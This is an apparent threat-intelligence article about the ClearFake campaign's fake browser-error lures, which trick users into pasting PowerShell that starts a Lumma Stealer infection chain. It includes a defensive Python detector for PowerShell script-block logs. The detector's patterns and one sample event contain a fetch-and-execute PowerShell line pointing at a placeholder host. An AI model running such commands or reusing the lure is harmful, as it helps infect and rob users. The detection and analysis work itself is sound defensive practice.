ClearFake Campaigns Trick Users Into Copying and Executing PowerShell Code
Cybersecurity defenses are often designed to counter sophisticated technical threats, yet the most critical vulnerability remains human behavior. Whether through malicious insiders with access to sensitive data, unintentional errors by employees, or clever social engineering tactics that manipulate trust, attackers continuously exploit human weaknesses to bypass security controls.
Malicious insiders may sell confidential information, human error can lead to misconfigured systems, and social engineering schemes trick employees into divulging credentials or executing malicious code. Understanding and mitigating these human vulnerabilities is essential to building a resilient cybersecurity posture.
The Malicious ClearFake Framework
ClearFake is a malicious JavaScript framework that threat actors deploy on compromised websites to deliver malware through drive-by download techniques. Initially identified in the second quarter of 2023, ClearFake emerged as a newcomer to the “fake updates” threat landscape, targeting both Windows and macOS users with fraudulent browser update prompts.
The ClearFake campaign typically starts when a user unknowingly visits a compromised webpage. Once the victim reaches the compromised site, the JavaScript framework uses a technique known as EtherHiding: it loads scripts hosted on the blockchain by reading them from Binance Smart Chain contracts. If the retrieved script passes its checks, it loads a second script, filtered through a Keitaro Traffic Distribution System (TDS), that renders the fraudulent prompt. These prompts, which mimic legitimate browser errors or updates, instruct the user to run a PowerShell script, claiming it is necessary to fix a viewing problem or to install a security certificate.
The campaign's hallmark was the use of a malicious PowerShell script, which users were instructed to copy and execute. This script flushed the DNS cache, removed clipboard content, and downloaded an additional encrypted PowerShell script that retrieved a compressed ZIP archive. The archive contained legitimate executables that side-loaded a trojanized DLL. This DLL, in turn, used DOILoader to load Lumma Stealer, which downloaded additional malware, including Amadey Loader, a downloader for a crypto miner, a clipboard hijacker, and potentially other malware like JaskaGO.
The threat actors behind ClearFake have demonstrated an ability to innovate and evolve their tactics over time. While the campaign initially targeted Windows users, it expanded its scope to include macOS users in late 2023. The actors behind the ClearFake framework use sophisticated techniques such as:
Blockchain-Based Obfuscation: The campaign uses the Binance Smart Chain (BSC) and the Ethers JavaScript library to store and retrieve malicious code, making detection and takedown more difficult.
Fake Update Prompts: The campaign displays fraudulent error messages or update prompts within the browser, mimicking legitimate updates from browsers like Chrome and Safari.
PowerShell-Based Execution: Victims are instructed to copy and run PowerShell scripts, which initiate the download and execution of the final payload.
Using Chrome Errors To Socially Engineer Victims
In their attempts to exploit users, attackers behind the ClearFake campaign created fake error messages mimicking Google Chrome browser errors. These errors were displayed as overlays on compromised websites, tricking users into believing that their browsers were malfunctioning. The error message would then prompt users to run a PowerShell script, allegedly to fix the issue.
Users Tricked Into Executing PowerShell Script
By presenting fake errors and detailed instructions, the campaign induces users to copy and paste scripts into PowerShell terminals. Once executed, the scripts initiate a sequence of malware downloads, leading to infection.
This approach lets attackers evade antivirus and endpoint detection products, because the initial script is pasted and executed directly from the clipboard: the user never downloads a file, and nothing is written to disk at that stage. This tactic exploits a gap in the detection coverage of many security solutions, which makes the campaign especially dangerous.
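The paste-and-run stage is still visible to PowerShell Script Block Logging (Event ID 4104), even though no file touches disk. The following is an added defender-side example, not code from the original post: it scans constructed, simplified 4104 records for the combination of behaviours the post describes (DNS cache flush, clipboard wipe, remote fetch and in-memory execution). The function names, the regex heuristics and the event shape are this example's own assumptions.

```python
import re

# Heuristic indicators for the behaviours described in the post. Pattern names and
# regexes are assumptions of this example, not published detection content.
INDICATORS = {
    "dns_flush":       re.compile(r"ipconfig\s+/flushdns|Clear-DnsClientCache", re.I),
    "clipboard_clear": re.compile(r"Set-Clipboard\s+(-Value\s+)?('{2}|\"{2}|\$null)", re.I),
    "remote_fetch":    re.compile(r"Invoke-WebRequest|\biwr\b|DownloadString|Invoke-RestMethod|\birm\b", re.I),
    "in_memory_exec":  re.compile(r"Invoke-Expression|\biex\b", re.I),
    "decode_step":     re.compile(r"FromBase64String|-EncodedCommand|\s-e(c|nc?)?\b", re.I),
}

def classify_script_block(text):
    """Return the matched indicator names and a verdict for one script block.
    A block is suspicious when it shows the hallmark pair (DNS flush plus clipboard
    wipe, which have no legitimate reason to appear together in an "update fix")
    or three or more indicators in total."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    hallmark = "dns_flush" in hits and "clipboard_clear" in hits
    return {"hits": hits, "suspicious": hallmark or len(hits) >= 3}

def scan_events(events):
    """events: iterable of dicts with 'event_id', 'user' and 'script_block' keys,
    a simplified shape of a Windows PowerShell 4104 (Script Block Logging) record."""
    findings = []
    for ev in events:
        if ev.get("event_id") != 4104:
            continue
        result = classify_script_block(ev["script_block"])
        if result["suspicious"]:
            findings.append({"user": ev["user"], "hits": result["hits"]})
    return findings

# Constructed sample events for demonstration; not real telemetry.
SAMPLE_EVENTS = [
    {"event_id": 4104, "user": "CORP\\alice",
     "script_block": "ipconfig /flushdns; Set-Clipboard -Value ''; "
                     "$s = iwr 'http://example.invalid/stage2'; iex $s.Content"},
    {"event_id": 4104, "user": "CORP\\bob",
     "script_block": "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"},
    {"event_id": 4104, "user": "CORP\\carol",
     "script_block": "Clear-DnsClientCache"},  # routine admin task alone is not flagged
    {"event_id": 4103, "user": "CORP\\dave",
     "script_block": "ipconfig /flushdns; Set-Clipboard -Value ''"},  # not a 4104 record
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"suspicious paste-and-run pattern for {f['user']}: {', '.join(f['hits'])}")
```

In a real deployment the same logic would run over exported 4104 events (for example via a SIEM query) and the indicator set would be tuned against the organisation's own baseline of administrative PowerShell use.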
TA571 is Leveraging ClearFake
ClearFake is primarily linked to a cluster of threat actors known as the ClearFake activity cluster. This group is responsible for deploying the JavaScript framework on compromised websites. However, there are indications that other threat actors, such as TA571, may also be leveraging similar techniques in their campaigns.
TA571, an initial access broker observed since March 2024, uses malspam with file attachments to deliver PowerShell-based malware payloads through fake Microsoft Word and OneDrive error messages. While TA571 primarily focuses on email-based delivery, it shares many techniques with the ClearFake campaign, particularly the use of social engineering to get users to execute malicious PowerShell scripts manually.
Conclusion
ClearFake represents a new evolution in fake update campaigns, combining advanced obfuscation techniques with social engineering to deceive users into compromising their systems. By leveraging blockchain technology and manipulating user trust in legitimate updates, the threat actors behind ClearFake have created a potent and adaptable framework capable of impacting organizations across multiple sectors. As the campaign continues to evolve, heightened vigilance and robust cybersecurity defenses are essential for mitigating the risks posed by this advanced malware delivery technique.